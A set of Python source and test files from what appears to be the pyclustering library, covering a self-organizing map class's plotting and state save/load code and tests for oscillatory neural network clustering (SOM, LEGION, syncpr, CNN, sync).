axes.plot(x[0], x[1], 'b.')
elif dimension == 3:
axes.scatter(x[0], x[1], x[2], c='b', marker='.')
# Show neurons
for index in range(self._size):
color = 'g'
if self._award[index] == 0:
color = 'y'
if dimension == 1:
axes.plot(self._weights[index][0], 0.0, color + marker_type)
if awards:
location = '{0}'.format(self._award[index])
axes.text(self._weights[index][0], 0.0, location, color='black', fontsize=10)
if belongs and self._data is not None:
location = '{0}'.format(index)
axes.text(self._weights[index][0], 0.0, location, color='black', fontsize=12)
for k in range(len(self._capture_objects[index])):
point = self._data[self._capture_objects[index][k]]
axes.text(point[0], 0.0, location, color='blue', fontsize=10)
if dimension == 2:
axes.plot(self._weights[index][0], self._weights[index][1], color + marker_type)
if awards:
location = '{0}'.format(self._award[index])
axes.text(self._weights[index][0], self._weights[index][1], location, color='black', fontsize=10)
if belongs and self._data is not None:
location = '{0}'.format(index)
axes.text(self._weights[index][0], self._weights[index][1], location, color='black', fontsize=12)
for k in range(len(self._capture_objects[index])):
point = self._data[self._capture_objects[index][k]]
axes.text(point[0], point[1], location, color='blue', fontsize=10)
if (self._conn_type != type_conn.func_neighbor) and (coupling is True):
for neighbor in self._neighbors[index]:
if neighbor > index:
axes.plot([self._weights[index][0], self._weights[neighbor][0]],
[self._weights[index][1], self._weights[neighbor][1]],
'g', linewidth=0.5)
elif dimension == 3:
axes.scatter(self._weights[index][0], self._weights[index][1], self._weights[index][2], c=color,
marker=marker_type)
                if (self._conn_type != type_conn.func_neighbor) and (coupling is True):
for neighbor in self._neighbors[index]:
if neighbor > index:
axes.plot([self._weights[index][0], self._weights[neighbor][0]],
[self._weights[index][1], self._weights[neighbor][1]],
[self._weights[index][2], self._weights[neighbor][2]],
'g-', linewidth=0.5)
plt.title("Network Structure")
plt.grid()
plt.show()
plt.close(fig)
def __get_dump_from_python(self, ccore_usage):
return {'ccore': ccore_usage,
'state': {'cols': self._cols,
'rows': self._rows,
'size': self._size,
'conn_type': self._conn_type,
'neighbors': self._neighbors,
'local_radius': self._local_radius,
'learn_rate': self._learn_rate,
'params': self._params,
'location': self._location,
'weights': self._weights,
'award': self._award,
'capture_objects': self._capture_objects}}
def __download_dump_from_ccore(self):
self._location = self.__initialize_locations(self._rows, self._cols)
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
self._capture_objects = wrapper.som_get_capture_objects(self.__ccore_som_pointer)
def __upload_common_part(self, state_dump):
self._cols = state_dump['cols']
self._rows = state_dump['rows']
self._size = state_dump['size']
self._conn_type = state_dump['conn_type']
self._neighbors = state_dump['neighbors']
self._local_radius = state_dump['local_radius']
self._learn_rate = state_dump['learn_rate']
self._params = state_dump['params']
def __upload_dump_to_python(self, state_dump):
self.__ccore_som_pointer = None
self.__upload_common_part(state_dump)
self._location = state_dump['location']
self._weights = state_dump['weights']
self._award = state_dump['award']
self._capture_objects = state_dump['capture_objects']
self._create_connections(self._conn_type)
def __upload_dump_to_ccore(self, state_dump):
self.__upload_common_part(state_dump)
self.__ccore_som_pointer = wrapper.som_create(self._rows, self._cols, self._conn_type, self._params)
wrapper.som_load(self.__ccore_som_pointer, state_dump['weights'], state_dump['award'],
state_dump['capture_objects'])
```
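The SOM class above is driven through a small train/simulate surface. A minimal usage sketch (the sample file, grid size and connection type are illustrative choices, not part of the source):

```python
from pyclustering.nnet.som import som, type_conn, som_parameters
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import SIMPLE_SAMPLES

# Train a 5x5 map with autostop and query the winner for the first point.
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
network = som(5, 5, type_conn.grid_four, som_parameters())
iterations = network.train(sample, 100, autostop=True)  # returns the epochs actually used
winner = network.simulate(sample[0])                    # index of the winning neuron
print(iterations, winner, network.get_winner_number())
```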
#### File: tests/integration/__init__.py
```python
import unittest
from pyclustering.tests.suite_holder import suite_holder
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.nnet.tests.integration import it_hhn as nnet_hhn_integration_tests
from pyclustering.nnet.tests.integration import it_legion as nnet_legion_integration_tests
from pyclustering.nnet.tests.integration import it_pcnn as nnet_pcnn_integration_tests
from pyclustering.nnet.tests.integration import it_som as nnet_som_integration_tests
from pyclustering.nnet.tests.integration import it_sync as nnet_sync_integration_tests
from pyclustering.nnet.tests.integration import it_syncpr as nnet_syncpr_integration_tests
from pyclustering.nnet.tests.integration import it_syncsegm as nnet_syncsegm_integration_tests
class nnet_integration_tests(suite_holder):
def __init__(self):
super().__init__()
nnet_integration_tests.fill_suite(self.get_suite())
@staticmethod
def fill_suite(integration_nnet_suite):
integration_nnet_suite.addTests(unittest.TestLoader().loadTestsFromModule(nnet_hhn_integration_tests))
integration_nnet_suite.addTests(unittest.TestLoader().loadTestsFromModule(nnet_legion_integration_tests))
integration_nnet_suite.addTests(unittest.TestLoader().loadTestsFromModule(nnet_pcnn_integration_tests))
integration_nnet_suite.addTests(unittest.TestLoader().loadTestsFromModule(nnet_som_integration_tests))
integration_nnet_suite.addTests(unittest.TestLoader().loadTestsFromModule(nnet_sync_integration_tests))
integration_nnet_suite.addTests(unittest.TestLoader().loadTestsFromModule(nnet_syncpr_integration_tests))
integration_nnet_suite.addTests(unittest.TestLoader().loadTestsFromModule(nnet_syncsegm_integration_tests))
```
#### File: tests/integration/it_som.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.nnet.tests.som_templates import SomTestTemplates
from pyclustering.nnet.som import som, type_conn, type_init, som_parameters
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES
from pyclustering.core.tests import remove_library
class SomIntegrationTest(unittest.TestCase):
def testTwoNeuronsTwoClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 2, 100, [5, 5], False, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1, 100, [5, 5], False, True)
def testTwoNeuronsTwoClustersByCoreStoreLoad(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 2, 100, [5, 5], False, True, store_load=True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1, 100, [5, 5], False, True, store_load=True)
def testAutostopTwoNeuronsTwoClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 2, 100, [5, 5], True, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1, 100, [5, 5], True, True)
def testAutostopTwoNeuronsTwoClustersByCoreStoreLoad(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 2, 100, [5, 5], True, True, store_load=True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1, 100, [5, 5], True, True, store_load=True)
def testThreeNeuronsThreeClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1, 3, 100, [5, 8, 10], False, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 1, 100, [5, 8, 10], False, True)
def testAutostopThreeNeuronsThreeClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1, 3, 100, [5, 8, 10], True, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 1, 100, [5, 8, 10], True, True)
def testFourNeuronsFourClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1, 4, 100, [10, 10, 10, 30], False, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 2, 2, 100, [10, 10, 10, 30], False, True)
def testAutostopFourNeuronsFourClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1, 4, 100, [10, 10, 10, 30], True, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 2, 2, 100, [10, 10, 10, 30], True, True)
def testTwoNeuronsFourClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1, 2, 100, [30, 30], False, True)
def testAutostopTwoNeuronsFourClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1, 2, 100, [30, 30], True, True)
def testSevenNeuronsHeptaClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(FCPS_SAMPLES.SAMPLE_HEPTA, 1, 7, 100, [30, 30, 30, 30, 30, 30, 32], False, True)
def testAutostopSevenNeuronsHeptaClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(FCPS_SAMPLES.SAMPLE_HEPTA, 1, 7, 100, [30, 30, 30, 30, 30, 30, 32], True, True)
def testFourNeuronsTetraClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(FCPS_SAMPLES.SAMPLE_TETRA, 1, 4, 100, [100, 100, 100, 100], False, True)
def testAutostopFourNeuronsTetraClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(FCPS_SAMPLES.SAMPLE_TETRA, 1, 4, 100, [100, 100, 100, 100], True, True)
def testTwoNeuronsTwoDiamondsClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, 1, 2, 100, [400, 400], False, True)
def testAutostopTwoNeuronsTwoDiamondsClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, 1, 2, 100, [400, 400], True, True)
def testFiveNeuronsFiveClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 1, 5, 100, [15, 15, 15, 15, 15], False, True)
def testAutostopFiveNeuronsFiveClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 1, 5, 100, [15, 15, 15, 15, 15], True, True)
def testFourNeuronsSquareClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 2, 2, 100, [15, 15, 15, 15], False, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 1, 4, 100, [15, 15, 15, 15], False, True)
def testAutostopFourNeuronsSquareClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 2, 2, 100, [15, 15, 15, 15], True, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 1, 4, 100, [15, 15, 15, 15], True, True)
def testOneDimensionSampleSimple7ClusterByCore(self):
parameters = som_parameters()
parameters.init_type = type_init.random_surface
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, 1, 100, [10, 10], True, True, parameters)
def testWinnersByCore(self):
SomTestTemplates.templateTestWinners(True)
def testSomVisualizationByCore(self):
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE4)
parameters = som_parameters()
network = som(5, 5, type_conn.grid_eight, parameters, ccore = True)
network.train(sample, 100, True)
network.show_network()
network.show_winner_matrix()
network.show_distance_matrix()
network.show_density_matrix()
def testSimulateCheckWinnerFuncNeighborByCore(self):
SomTestTemplates.templateTestSimulate(type_conn.func_neighbor, True)
def testSimulateCheckWinnerFuncNeighborByCoreStoreLoad(self):
SomTestTemplates.templateTestSimulate(type_conn.func_neighbor, True, store_load=True)
def testSimulateCheckWinnerGridFourByCore(self):
SomTestTemplates.templateTestSimulate(type_conn.grid_four, True)
def testSimulateCheckWinnerGridFourByCoreStoreLoad(self):
SomTestTemplates.templateTestSimulate(type_conn.grid_four, True, store_load=True)
def testSimulateCheckWinnerGridEightByCore(self):
SomTestTemplates.templateTestSimulate(type_conn.grid_eight, True)
def testSimulateCheckWinnerGridEightByCoreStoreLoad(self):
SomTestTemplates.templateTestSimulate(type_conn.grid_eight, True, store_load=True)
def testSimulateCheckWinnerHoneycombByCore(self):
SomTestTemplates.templateTestSimulate(type_conn.honeycomb, True)
def testSimulateCheckWinnerHoneycombByCoreStoreLoad(self):
SomTestTemplates.templateTestSimulate(type_conn.honeycomb, True, store_load=True)
def testNetwork2x2RandomState5ByCore(self):
SomTestTemplates.random_state(2, 2, type_conn.honeycomb, 5, True)
def testNetwork2x2RandomState5FuncNeighborByCore(self):
SomTestTemplates.random_state(2, 2, type_conn.func_neighbor, 5, True)
def testNetwork2x2RandomState10ByCore(self):
SomTestTemplates.random_state(2, 2, type_conn.honeycomb, 10, True)
def testNetwork2x2RandomState10FuncNeighborByCore(self):
SomTestTemplates.random_state(2, 2, type_conn.func_neighbor, 10, True)
def testNetwork2x3RandomState5ByCore(self):
SomTestTemplates.random_state(2, 3, type_conn.honeycomb, 5, True)
def testNetwork2x3RandomState10ByCore(self):
SomTestTemplates.random_state(2, 3, type_conn.honeycomb, 10, True)
def testNetwork1x8RandomState5ByCore(self):
SomTestTemplates.random_state(1, 8, type_conn.honeycomb, 5, True)
def testNetwork1x8RandomState10ByCore(self):
SomTestTemplates.random_state(1, 8, type_conn.honeycomb, 10, True)
def testNetwork1x8GridFourByCore(self):
SomTestTemplates.random_state(1, 8, type_conn.grid_four, 5, True)
SomTestTemplates.random_state(8, 1, type_conn.grid_four, 5, True)
def testNetwork1x8GridEightByCore(self):
SomTestTemplates.random_state(1, 8, type_conn.grid_eight, 5, True)
SomTestTemplates.random_state(8, 1, type_conn.grid_eight, 5, True)
    def testNetwork1x8FuncNeighborByCore(self):
SomTestTemplates.random_state(1, 8, type_conn.func_neighbor, 5, True)
SomTestTemplates.random_state(8, 1, type_conn.func_neighbor, 5, True)
def testProcessingWhenLibraryCoreRemoved(self):
self.runRemovedLibraryCoreTest()
@remove_library
def runRemovedLibraryCoreTest(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 2, 100, [5, 5], False, True)
```
#### File: nnet/tests/legion_templates.py
```python
from pyclustering.nnet.legion import legion_network;
from pyclustering.nnet import conn_type;
from pyclustering.utils import extract_number_oscillations;
class LegionTestTemplates:
@staticmethod
def templateOscillationsWithStructures(type_conn, ccore_flag):
        net = legion_network(4, type_conn = type_conn, ccore = ccore_flag);
dynamic = net.simulate(500, 1000, [1, 1, 1, 1]);
for i in range(len(net)):
assert extract_number_oscillations(dynamic.output, i) > 1;
@staticmethod
def templateSyncEnsembleAllocation(stimulus, params, type_conn, sim_steps, sim_time, expected_clusters, ccore_flag):
result_testing = False;
for _ in range(0, 5, 1):
net = legion_network(len(stimulus), params, type_conn, ccore = ccore_flag);
dynamic = net.simulate(sim_steps, sim_time, stimulus);
ensembles = dynamic.allocate_sync_ensembles(0.1);
if (ensembles != expected_clusters):
continue;
result_testing = True;
break;
assert result_testing;
@staticmethod
def templateOutputDynamicInformation(stimulus, params, type_conn, sim_steps, sim_time, ccore_flag):
legion_instance = legion_network(len(stimulus), params, type_conn, ccore = ccore_flag);
dynamic = legion_instance.simulate(sim_steps, sim_time, stimulus);
assert len(dynamic.output) > 0;
assert len(dynamic.inhibitor) > 0;
assert len(dynamic.time) > 0;
```
#### File: nnet/tests/syncpr_templates.py
```python
import matplotlib;
matplotlib.use('Agg');
from pyclustering.nnet import solve_type;
from pyclustering.nnet.syncpr import syncpr, syncpr_visualizer;
class SyncprTestTemplates:
@staticmethod
def templateOutputDynamic(solver, ccore):
net = syncpr(5, 0.1, 0.1, ccore);
output_dynamic = net.simulate(10, 10, [-1, 1, -1, 1, -1], solver, True);
        assert len(output_dynamic) == 11; # 10 steps plus the initial state.
@staticmethod
def templateOutputDynamicLengthStaticSimulation(collect_flag, ccore_flag):
net = syncpr(5, 0.1, 0.1, ccore_flag);
output_dynamic = net.simulate_static(10, 10, [-1, 1, -1, 1, -1], solution = solve_type.FAST, collect_dynamic = collect_flag);
if (collect_flag is True):
            assert len(output_dynamic) == 11; # 10 steps plus the initial state.
else:
assert len(output_dynamic) == 1;
@staticmethod
def templateOutputDynamicLengthDynamicSimulation(collect_flag, ccore_flag):
net = syncpr(5, 0.1, 0.1, ccore_flag);
output_dynamic = net.simulate_dynamic([-1, 1, -1, 1, -1], solution = solve_type.FAST, collect_dynamic = collect_flag);
if (collect_flag is True):
assert len(output_dynamic) > 1;
else:
assert len(output_dynamic) == 1;
@staticmethod
def templateIncorrectPatternForSimulation(pattern, ccore_flag):
net = syncpr(10, 0.1, 0.1, ccore=ccore_flag);
        try: net.simulate(10, 10, pattern);
        except Exception: return;
        assert False;
@staticmethod
def templateTrainNetworkAndRecognizePattern(ccore_flag):
net = syncpr(10, 0.1, 0.1, ccore_flag);
patterns = [];
patterns += [ [1, 1, 1, 1, 1, -1, -1, -1, -1, -1] ];
patterns += [ [-1, -1, -1, -1, -1, 1, 1, 1, 1, 1] ];
net.train(patterns);
# recognize it
for i in range(len(patterns)):
output_dynamic = net.simulate(10, 10, patterns[i], solve_type.RK4, True);
ensembles = output_dynamic.allocate_sync_ensembles(0.5);
assert len(ensembles) == 2;
assert len(ensembles[0]) == len(ensembles[1]);
# sort results
ensembles[0].sort();
ensembles[1].sort();
assert (ensembles[0] == [0, 1, 2, 3, 4]) or (ensembles[0] == [5, 6, 7, 8, 9]);
assert (ensembles[1] == [0, 1, 2, 3, 4]) or (ensembles[1] == [5, 6, 7, 8, 9]);
@staticmethod
def templateIncorrectPatternForTraining(patterns, ccore_flag):
net = syncpr(10, 0.1, 0.1, ccore_flag);
        try: net.train(patterns);
        except Exception: return;
        assert False;
@staticmethod
def templatePatternVisualizer(collect_dynamic, ccore_flag = False):
net = syncpr(5, 0.1, 0.1, ccore = ccore_flag);
output_dynamic = net.simulate(10, 10, [-1, 1, -1, 1, -1], solve_type.RK4, collect_dynamic);
syncpr_visualizer.show_pattern(output_dynamic, 5, 2);
syncpr_visualizer.animate_pattern_recognition(output_dynamic, 1, 5);
@staticmethod
def templateMemoryOrder(ccore_flag):
net = syncpr(10, 0.1, 0.1, ccore_flag);
patterns = [];
patterns += [ [1, 1, 1, 1, 1, -1, -1, -1, -1, -1] ];
patterns += [ [-1, -1, -1, -1, -1, 1, 1, 1, 1, 1] ];
net.train(patterns);
assert net.memory_order(patterns[0]) < 0.8;
assert net.memory_order(patterns[1]) < 0.8;
for pattern in patterns:
net.simulate(20, 10, pattern, solve_type.RK4);
memory_order = net.memory_order(pattern);
assert (memory_order > 0.95) and (memory_order <= 1.000005);
@staticmethod
    def templateStaticSimulation(ccore_flag):
        net = syncpr(10, 0.1, 0.1, ccore_flag);
patterns = [];
patterns += [ [1, 1, 1, 1, 1, -1, -1, -1, -1, -1] ];
patterns += [ [-1, -1, -1, -1, -1, 1, 1, 1, 1, 1] ];
net.train(patterns);
net.simulate_static(20, 10, patterns[0], solve_type.RK4);
memory_order = net.memory_order(patterns[0]);
assert (memory_order > 0.95) and (memory_order <= 1.000005);
@staticmethod
def templateDynamicSimulation(ccore_flag):
net = syncpr(10, 0.1, 0.1, ccore_flag);
patterns = [];
patterns += [ [1, 1, 1, 1, 1, -1, -1, -1, -1, -1] ];
patterns += [ [-1, -1, -1, -1, -1, 1, 1, 1, 1, 1] ];
net.train(patterns);
net.simulate_dynamic(patterns[0], order = 0.998, solution = solve_type.RK4);
memory_order = net.memory_order(patterns[0]);
assert (memory_order > 0.998) and (memory_order <= 1.0);
@staticmethod
def templateGlobalSyncOrder(ccore_flag):
net = syncpr(10, 0.1, 0.1, ccore_flag);
patterns = [ [1, 1, 1, 1, 1, -1, -1, -1, -1, -1] ];
patterns += [ [-1, -1, -1, -1, -1, 1, 1, 1, 1, 1] ];
global_sync_order = net.sync_order();
assert (global_sync_order < 1.0) and (global_sync_order > 0.0);
net.train(patterns);
global_sync_order = net.sync_order();
assert (global_sync_order < 1.0) and (global_sync_order > 0.0);
@staticmethod
def templateLocalSyncOrder(ccore_flag):
net = syncpr(10, 0.1, 0.1, ccore_flag);
patterns = [ [1, 1, 1, 1, 1, -1, -1, -1, -1, -1] ];
patterns += [ [-1, -1, -1, -1, -1, 1, 1, 1, 1, 1] ];
local_sync_order = net.sync_local_order();
assert (local_sync_order < 1.0) and (local_sync_order > 0.0);
net.train(patterns);
local_sync_order = net.sync_local_order();
assert (local_sync_order < 1.0) and (local_sync_order > 0.0);
@staticmethod
def templateIncorrectPatternValues(ccore_flag):
patterns = [];
patterns += [ [2, 1, 1, 1, 1, -1, -1, -1, -1, -1] ];
patterns += [ [-1, -2, -1, -1, -1, 1, 1, 1, 1, 1] ];
SyncprTestTemplates.templateIncorrectPatternForTraining(patterns, ccore_flag);
```
#### File: tests/unit/ut_cnn.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.nnet.cnn import type_conn, cnn_network, cnn_visualizer
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.utils import read_sample
class CnnUnitTest(unittest.TestCase):
    def templateSyncEnsembleAllocation(self, stimulus, steps, connection, amount_neighbors, analysed_iterations, expected_length_ensembles):
        testing_result = False
        for _ in range(3):
            network_instance = cnn_network(len(stimulus), connection, amount_neighbors)
            output_dynamic = network_instance.simulate(steps, stimulus)
            ensembles = output_dynamic.allocate_sync_ensembles(analysed_iterations)
            obtained_ensemble_sizes = [len(ensemble) for ensemble in ensembles]
            # critical checks - always determined
            assert len(stimulus) == len(network_instance)
            assert len(stimulus) == sum(obtained_ensemble_sizes)
            if expected_length_ensembles is not None:
                obtained_ensemble_sizes.sort()
                expected_length_ensembles.sort()
                if obtained_ensemble_sizes != expected_length_ensembles:
                    continue
            testing_result = True
            break
        assert testing_result is True
def testClusteringPhenomenonSimpleSample01(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.ALL_TO_ALL, 3, 10, [5, 5])
def testGlobalSynchronizationSimpleSample01(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.ALL_TO_ALL, 9, 10, [10])
def testDelaunayTriangulationSimpleSample01(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.TRIANGULATION_DELAUNAY, 3, 10, None)
def testClusteringPhenomenonSimpleSample02(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.ALL_TO_ALL, 3, 10, [10, 5, 8])
def testGlobalSynchronizationSimpleSample02(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.ALL_TO_ALL, 22, 10, [10, 5, 8])
def testDelaunayTriangulationSimpleSample02(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.TRIANGULATION_DELAUNAY, 22, 10, None)
def testClusteringPhenomenonSimpleSample03(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.ALL_TO_ALL, 3, 10, [10, 10, 10, 30])
def testClusteringPhenomenonSimpleSample04(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE4)
self.templateSyncEnsembleAllocation(stimulus, 200, type_conn.ALL_TO_ALL, 10, 10, [15, 15, 15, 15, 15])
def testClusteringPhenomenonSimpleSample05(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE5)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.ALL_TO_ALL, 5, 10, [15, 15, 15, 15])
def testChaoticNeuralNetwork2DVisualization(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
network_instance = cnn_network(len(stimulus))
output_dynamic = network_instance.simulate(100, stimulus)
network_instance.show_network()
cnn_visualizer.show_dynamic_matrix(output_dynamic)
cnn_visualizer.show_observation_matrix(output_dynamic)
cnn_visualizer.show_output_dynamic(output_dynamic)
def testChaoticNeuralNetwork3DVisualization(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE11)
network_instance = cnn_network(len(stimulus))
output_dynamic = network_instance.simulate(10, stimulus)
network_instance.show_network()
cnn_visualizer.show_dynamic_matrix(output_dynamic)
cnn_visualizer.show_observation_matrix(output_dynamic)
cnn_visualizer.show_output_dynamic(output_dynamic)
```
#### File: tests/unit/ut_sync.py
```python
import unittest;
# Generate images without having a window appear.
import matplotlib;
matplotlib.use('Agg');
from pyclustering.nnet.tests.sync_templates import SyncTestTemplates;
from pyclustering.nnet import solve_type, conn_type;
from pyclustering.nnet.sync import sync_network, sync_dynamic, sync_visualizer;
from pyclustering.utils import pi;
class SyncUnitTest(unittest.TestCase):
def testCreateNetwork(self):
SyncTestTemplates.templateCreateNetwork(1, False);
SyncTestTemplates.templateCreateNetwork(10, False);
SyncTestTemplates.templateCreateNetwork(55, False);
def testConnectionsApi(self):
SyncTestTemplates.templateConnectionsApi(1, False);
SyncTestTemplates.templateConnectionsApi(5, False);
SyncTestTemplates.templateConnectionsApi(10, False);
def testSyncOrderSingleOscillator(self):
# Check for order parameter of network with one oscillator
network = sync_network(1, 1, ccore=False);
assert network.sync_order() == 1;
def testSyncOrderNetwork(self):
# Check for order parameter of network with several oscillators
network = sync_network(2, 1, ccore=False);
sync_state = 1;
tolerance = 0.1;
network.simulate(50, 20, solve_type.RK4);
assert (abs(network.sync_order() - sync_state) < tolerance) == True;
def testSyncLocalOrderSingleOscillator(self):
network = sync_network(1, 1);
assert network.sync_local_order() == 0;
def testOutputNormalization(self):
network = sync_network(20, 1, ccore=False);
output_dynamic = network.simulate(50, 20, solve_type.RK4);
t = output_dynamic.time;
dyn = output_dynamic.output;
for iteration in range(len(dyn)):
for index_oscillator in range(len(dyn[iteration])):
assert (dyn[iteration][index_oscillator] >= 0);
assert (dyn[iteration][index_oscillator] <= 2.0 * pi);
def testFastSolution(self):
# Check for convergence when solution using fast way of calculation of derivative
SyncTestTemplates.templateSimulateTest(10, 1, solve_type.FAST, False);
def testRK4Solution(self):
# Check for convergence when solution using RK4 function of calculation of derivative
SyncTestTemplates.templateSimulateTest(10, 1, solve_type.RK4, False);
def testLargeNetwork(self):
# Check for convergence of phases in large network - network that contains large number of oscillators
SyncTestTemplates.templateSimulateTest(128, 1, solve_type.FAST, False);
def testOutputDynamicAroundZero(self):
phases = [ [ 0.01, 0.02, 0.04, 6.27, 6.28, 6.25, 0.03] ];
time = [ 10.0 ];
output_sync_dynamic = sync_dynamic(phases, time, None);
assert len(output_sync_dynamic.allocate_sync_ensembles(0.2)) == 1;
assert len(output_sync_dynamic.allocate_sync_ensembles(0.1)) == 1;
phases = [ [ 1.02, 1.05, 1.52, 5.87, 5.98, 5.14] ];
output_sync_dynamic = sync_dynamic(phases, time, None);
assert len(output_sync_dynamic.allocate_sync_ensembles(3.0)) == 1;
assert len(output_sync_dynamic.allocate_sync_ensembles(2.0)) == 1;
def testDynamicSimulationAllToAll(self):
SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(10, 1, conn_type.ALL_TO_ALL, False);
SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(50, 1, conn_type.ALL_TO_ALL, False);
def testDynamicSimulationGridFour(self):
SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(9, 1, conn_type.GRID_FOUR, False);
SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(25, 1, conn_type.GRID_FOUR, False);
def testDynamicSimulationGridEight(self):
        SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(9, 1, conn_type.GRID_EIGHT, False);
        SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(25, 1, conn_type.GRID_EIGHT, False);
def testDynamicSimulationBidir(self):
SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(5, 1, conn_type.LIST_BIDIR, False);
SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(10, 1, conn_type.LIST_BIDIR, False);
def testTwoOscillatorDynamic(self):
SyncTestTemplates.templateDynamicSimulationConvergence(2, 1, conn_type.ALL_TO_ALL, False);
def testThreeOscillatorDynamic(self):
SyncTestTemplates.templateDynamicSimulationConvergence(3, 1, conn_type.ALL_TO_ALL, False);
def testFourOscillatorDynamic(self):
SyncTestTemplates.templateDynamicSimulationConvergence(4, 1, conn_type.ALL_TO_ALL, False);
def testFiveOscillatorDynamic(self):
SyncTestTemplates.templateDynamicSimulationConvergence(5, 1, conn_type.ALL_TO_ALL, False);
def testSixOscillatorDynamic(self):
SyncTestTemplates.templateDynamicSimulationConvergence(6, 1, conn_type.ALL_TO_ALL, False);
def testSevenOscillatorDynamic(self):
SyncTestTemplates.templateDynamicSimulationConvergence(7, 1, conn_type.ALL_TO_ALL, False);
def testOutputDynamicLengthSimulation(self):
net = sync_network(5, ccore=False);
output_dynamic = net.simulate(10, 10, solution = solve_type.FAST, collect_dynamic = True);
